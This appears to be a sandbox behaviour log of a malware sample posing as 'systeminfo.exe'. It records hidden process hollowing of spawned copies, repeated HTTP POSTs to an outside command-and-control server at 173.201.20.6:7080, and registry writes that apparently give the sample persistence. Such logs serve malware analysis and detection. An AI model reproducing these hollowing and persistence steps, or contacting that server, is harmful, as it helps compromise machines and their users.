System	Get Time	type = Local Time, time = 2017-11-28 18:18:23 (Local Time)	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:23 (Local Time)	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x36f9bc	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x36f9f4	1	Fn
Module	Get Address	function = LoadLibraryA, ordinal = 0, address_out = 0x36fa64	1	Fn
Module	Get Address	function = UnmapViewOfFile, ordinal = 0, address_out = 0x36fa64	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x36fa64	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x36fa64	1	Fn
Module	Get Address	function = VirtualProtect, ordinal = 0, address_out = 0x36fa64	1	Fn
Module	Get Address	function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64	1	Fn
Module	Get Address	function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x752a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x752adbeb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x752a9894	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x752a9cee	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x759f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x75aa6aa8	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75a01700	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x75a2828e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75a05929	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75a23102	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x75a014b1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x75a1b6e0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameExA, address_out = 0x75a842ef	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75a05a4b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75a1eceb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x75790000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x757bae5f	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x756e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x7570a4b4	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
System	Get Computer Name	result_out = YKyd69q, type = ComputerNameDnsHostname	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Module	Unmap	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
Mutex	Release	-	1	Fn
System	Get Time	type = Ticks, time = 106408	1	Fn

Thread 0x84c

(Host: 31, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 111415	1	Fn
System	Get Time	type = Ticks, time = 115409	1	Fn
System	Get Time	type = Ticks, time = 132117	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Process	Create	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp", os_pid = 0x66c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Memory	Get Info	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp", address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536	1	Fn
Memory	Allocate	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Thread	Get Context	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x84c	1	Fn
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp", address = 0x400000, size = 114688	1	Fn Data
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp", address = 0x7efde008, size = 4	1	Fn Data
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp", address = 0x7efdf010, size = 4	1	Fn Data
Thread	Set Context	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x84c	1	Fn
Thread	Resume	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x84c	1	Fn
System	Get Time	type = Ticks, time = 137670	1	Fn
System	Get Time	type = Ticks, time = 137904	3	Fn
System	Get Time	type = Ticks, time = 137982	1	Fn
System	Get Time	type = Ticks, time = 138903	3	Fn
System	Get Time	type = Ticks, time = 138981	1	Fn
System	Get Time	type = Ticks, time = 139917	3	Fn
System	Get Time	type = Ticks, time = 140915	3	Fn
System	Get Time	type = Ticks, time = 140993	1	Fn
System	Get Time	type = Ticks, time = 141914	3	Fn
System	Get Time	type = Ticks, time = 141992	1	Fn
System	Get Time	type = Ticks, time = 142912	3	Fn
System	Get Time	type = Ticks, time = 142990	1	Fn
System	Get Time	type = Ticks, time = 143910	2	Fn
File	Create	filename = C:\ProgramData\FB6F.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
System	Get Time	type = Ticks, time = 143910	1	Fn
System	Get Time	type = Ticks, time = 143988	1	Fn
System	Get Time	type = Ticks, time = 144909	2	Fn
System	Get Time	type = Ticks, time = 144987	1	Fn

Thread 0x864

(Host: 38, Network: 88)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 112414	1	Fn
System	Get Time	type = Ticks, time = 113412	1	Fn
System	Get Time	type = Ticks, time = 114411	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 443124, size_out = 443124	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 130916	3	Fn
System	Get Time	type = Ticks, time = 130994	1	Fn
System	Get Time	type = Ticks, time = 131415	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 132382	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
System	Get Time	type = Ticks, time = 145408	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 146422	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 147420	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 148419	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 149417	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn

Thread 0x884

(Host: 25, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 118420	1	Fn
System	Get Time	type = Ticks, time = 119418	1	Fn
System	Get Time	type = Ticks, time = 120417	1	Fn
System	Get Time	type = Ticks, time = 121415	1	Fn
System	Get Time	type = Ticks, time = 122413	1	Fn
System	Get Time	type = Ticks, time = 123412	1	Fn
System	Get Time	type = Ticks, time = 124410	1	Fn
System	Get Time	type = Ticks, time = 125409	1	Fn
System	Get Time	type = Ticks, time = 126423	1	Fn
System	Get Time	type = Ticks, time = 127421	1	Fn
System	Get Time	type = Ticks, time = 128420	1	Fn
System	Get Time	type = Ticks, time = 129434	1	Fn
System	Get Time	type = Ticks, time = 130416	1	Fn
System	Get Time	type = Ticks, time = 131914	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Process	Create	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp", os_pid = 0x674, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Memory	Get Info	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp", address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536	1	Fn
Memory	Allocate	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400	1	Fn
Thread	Get Context	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x884	1	Fn
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp", address = 0x400000, size = 102400	1	Fn Data
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp", address = 0x7efde008, size = 4	1	Fn Data
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp", address = 0x7efdf010, size = 4	1	Fn Data
Thread	Set Context	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x884	1	Fn
Thread	Resume	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x884	1	Fn
System	Get Time	type = Ticks, time = 132569	1	Fn

Thread 0x8b4

(Host: 71, Network: 132)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 116423	1	Fn
System	Get Time	type = Ticks, time = 117421	1	Fn
System	Get Time	type = Ticks, time = 131961	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Process	Create	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp", os_pid = 0xa98, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Memory	Get Info	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp", address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536	1	Fn
Memory	Allocate	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736	1	Fn
Thread	Get Context	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x8b4	1	Fn
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp", address = 0x400000, size = 372736	1	Fn Data
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp", address = 0x7efde008, size = 4	1	Fn Data
Memory	Write	process_name = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp", address = 0x7efdf010, size = 4	1	Fn Data
Thread	Set Context	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x8b4	1	Fn
Thread	Resume	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, os_tid = 0x8b4	1	Fn
System	Get Time	type = Ticks, time = 134129	1	Fn
System	Get Time	type = Ticks, time = 134410	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
